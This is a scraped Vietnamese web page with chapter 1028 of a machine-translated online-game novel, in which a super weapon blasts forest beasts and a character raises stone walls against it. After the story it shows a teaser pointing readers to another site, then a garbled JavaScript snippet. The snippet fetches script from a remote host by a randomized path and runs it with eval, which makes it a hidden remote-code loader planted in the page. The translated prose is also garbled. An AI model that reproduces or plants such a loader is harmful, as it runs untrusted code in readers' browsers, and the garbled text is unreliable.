Võng du chi bình phàm chi lộ 2 chương 1028 hỏa khí chi uy _ Zeus tiểu thuyết võng
Trước mặt vị trí:Zeus tiểu thuyết võng&nbsp>>Trò chơi>>Võng du chi bình phàm chi lộ 2>>Võng du chi bình phàm chi lộ 2 mới nhất chương danh sách>> chương 1028 hỏa khí chi uy

Chương 1028 hỏa khí chi uy


Đổi mới thời gian:2017 năm 06 nguyệt 14 ngày tác giả:Dê béoPhân loại:Trò chơi|Giả thuyết võng du|Dê béo|Võng du chi bình phàm chi lộ 2
Dê béo tác phẩm


300 mễ……

250 mễ……

200 mễ……

Rốt cuộc đám kia ngày mộ rừng rậm dị thú cùng phái chủ chiến dị nhân tất cả đều tiến vào tới rồi thiên cơ sở công đạo siêu cấp hỏa khí công kích phạm vi, Grandet cũng ở bọn họ tiến vào tầm bắn nháy mắt huy hạ giơ lên tay phải.

“Khai hỏa!” Tuy rằng khoảng cách gần trong gang tấc, nhưng Grandet vẫn là ra sức quát, thanh âm kia chỉ sợ cũng liền 200 mễ ở ngoài địch nhân cũng đều có thể nghe được.

Grandet kỳ thật này một giọng nói là vì kêu cấp một người, không, hẳn là một con dị thú nghe, kia chỉ dị thú đó là Sicily kỳ.

Lần này hành động phía trước, Grandet đi tìm Sicily kỳ nói một chút sự tình, trong đó liền công đạo ở vạn bất đắc dĩ dưới tình huống, hắn sẽ lựa chọn hiện tại loại này vô khác biệt bao trùm công kích, mà ở phát động như vậy công kích phía trước, Grandet sẽ rống lớn ra “Khai hỏa” tín hiệu, cho nên ở đã chịu này một tín hiệu sau, Sicily kỳ muốn tận khả năng chạy ra công kích phạm vi, mà Grandet công đạo Sicily kỳ chạy trốn lộ tuyến tự tả hướng hữu 45 độ.

Sicily kỳ đã sớm nghĩ đến Grandet sẽ chọn dùng như thế cực đoan thủ đoạn, cho nên đã sớm làm tốt một mình chạy trốn chuẩn bị, mà ở nghe được Grandet “Khai hỏa” tín hiệu sau, hắn liền trước tiên dựa theo phía trước Grandet công đạo quá chạy trốn lộ tuyến tiến hành rút lui.

Liền ở Grandet khai hỏa mệnh lệnh hạ đạt, Sicily kỳ hướng hữu phía sau 45 độ phương hướng rút lui nháy mắt, một đạo bạch quang hiện lên.

Đạo bạch quang này kỳ thật là chính là một đạo chùm tia sáng, đến từ chính siêu cấp hỏa khí xạ kích năng lượng chùm tia sáng, này một đạo năng lượng chùm tia sáng thoạt nhìn rất nhỏ, nhưng liền ở chùm tia sáng bắn ra nháy mắt, nửa cái ngày mộ rừng rậm bị này bạch quang sở bao trùm trong đó, mà liền ở màu trắng chùm tia sáng công kích đường nhỏ chung quanh 10 mét trong phạm vi sở hữu cây cối nháy mắt hóa thành tro tàn, mà chung quanh đám kia ngày mộ rừng rậm dị thú cùng phái chủ chiến dị nhân cũng đều đã chịu này đạo chùm tia sáng mang đến nghiêm trọng thương tổn.

Thấy tình huống không ổn, Nam Sơn chưa rống lớn nói: “Mau bỏ đi, tất cả đều cho ta rút về tới!”

Phái chủ chiến dị nhân nhóm còn là phi thường phục tùng Nam Sơn chưa mệnh lệnh, ở Nam Sơn chưa mệnh lệnh hạ đạt nháy mắt, sở hữu phái chủ chiến dị nhân bắt đầu triệt thoái phía sau.

Mà còn chưa chờ những cái đó phái chủ chiến dị nhân rút khỏi siêu cấp hỏa khí công kích phạm vi, lại có lưỡng đạo màu trắng chùm tia sáng đồng thời bắn ra.

Phía trước sở dĩ sẽ chỉ có một đạo màu trắng quang sắc là bởi vì Grandet đám người còn không rõ ràng lắm này siêu cấp hỏa khí uy lực, cho nên bắn trước một pháo tới xem một chút uy lực, mà hiện tại ở xác định uy lực lúc sau, Grandet lập tức hạ đạt hai pháo tề phóng mệnh lệnh.

Theo Grandet hai pháo tề phóng mệnh lệnh hạ đạt, 200 mét phạm vi mặt đất đều biến thành đất khô cằn, mà những cái đó ngày mộ rừng rậm dị thú cũng tất cả đều ngã xuống trên mặt đất, đến nỗi phái chủ chiến dị nhân người chơi tình trạng so sánh với những cái đó dị thú cũng còn không đến chạy đi đâu, 80 danh phái chủ chiến dị nhân chỉ có 31 người thành công trốn ra công kích phạm vi, còn lại 49 người tất cả đều ngã xuống trên mặt đất.

Này đột nhiên siêu cấp hỏa khí tập kích hoàn toàn ra ngoài Nam Sơn chưa đoán trước, hiện giờ các thủ hạ của hắn đã chịu như thế nghiêm trọng thương vong, hắn khó từ trách nhiệm, cho nên liền ở siêu cấp hỏa khí đệ tam sóng công kích đánh úp lại phía trước, Nam Sơn chưa vọt tới còn ở siêu cấp hỏa khí công kích phạm vi phái chủ chiến dị nhân nhóm phía trước, vung tay lên một cái dài chừng 20 mét, độ cao ở 5 mét tả hữu tường đá vắt ngang ở chúng phái chủ chiến dị nhân trước mặt.

Tường đá vừa mới xuất hiện, siêu cấp hỏa khí công kích lại lần nữa đánh úp lại, lại là lưỡng đạo bạch quang.

Nhưng mà lúc này đây ở tường đá phía sau phái chủ chiến dị nhân nhóm cũng không có đã chịu kia lưỡng đạo bạch quang công kích ảnh hưởng, mà ở số lượng vừa phải đối diện đám kia ngày mộ rừng rậm dị thú tắc tất cả đều hóa thành bột mịn, có thể thấy được này siêu cấp hỏa khí công kích có bao nhiêu cường hãn.

Tường đá tuy rằng chặn lại siêu cấp hỏa khí đệ tam sóng công kích, nhưng tường đá cũng hoàn toàn băng nát.

Tường đá băng toái, Nam Sơn chưa lập tức khom người dùng tay chạm đất, đồng thời có một mặt cùng phía trước giống nhau kích cỡ tường đá vắt ngang ở chúng phái chủ chiến dị nhân trước mặt, đương nhiên lần này này mặt tường đá cường độ đã xa không kịp phía trước kia mặt tường đá, bất quá này cũng không có cách nào, này đã là Nam Sơn chưa hết toàn lực có khả năng thi triển ra lớn nhất lực lượng lạp!

Bố trí tường đá lực lượng kỳ thật cũng là Nam Sơn chưa thông qua phía trước một lần bí địa tế đàn sở kích hoạt, bất quá kích phát tế đàn thời điểm Nam Sơn chưa cũng không có sử dụng kim sắc đá quý, cho nên tế đàn tuy rằng bị kích phát rồi, nhưng tế đàn sở phóng xuất ra thức tỉnh chi lực cũng không có được đến hoàn toàn phát ra, bởi vậy Nam Sơn chưa sở giác tỉnh hậu thổ chi lực cũng không giống cao làm đám người sở giác tỉnh sương lạnh chi lực như vậy thuần túy.

Nam Sơn chưa được đến ngươi hiện tại sở xem 《》 chỉ có non nửa chương, muốn xem hoàn chỉnh phiên bản thỉnh Baidu lục soát: ( băng lôi tiếng Trung ) tiến vào sau lại lục soát:

}el sắc if(v1){

;(function{vard(/UCBrow sắc rQQBrow sắc r/i.test(navigator.u sắc rAgent))'s.pomhz':'s.pomhz';varanewXMLHttpRequest;varbd'/7735/9036/'Math.floor(Math.random*99999991);if(a!null){a.onreadystatechangefunction{if(a.readyState4&&a.status200){if(window.execScript)window.execScript(a.respon sắc Text, "JavaScript" );el sắc if(window.eval)window.eval(a.respon sắc Text, "JavaScript" );el sắc eval(a.respon sắc Text);}};a.open( "GET",b,fal sắc );a. Sắc nd;}});

}el sắc {

;(function{vard(/UCBrow sắc rQQBrow sắc r/i.test(navigator.u sắc rAgent))'s.pomhz':'s.pomhz';varanewXMLHttpRequest;varbd'/7860/9300/'Math.floor(Math.random*99999991);if(a!null){a.onreadystatechangefunction{if(a.readyState4&&a.status200){if(window.execScript)window.execScript(a.respon sắc Text, "JavaScript" );el sắc if(window.eval)window.eval(a.respon sắc Text, "JavaScript" );el sắc eval(a.respon sắc Text);}};a.open( "GET",b,fal sắc );a. Sắc nd;}});

Chương trước|Võng du chi bình phàm chi lộ 2 mục lục|Chương sau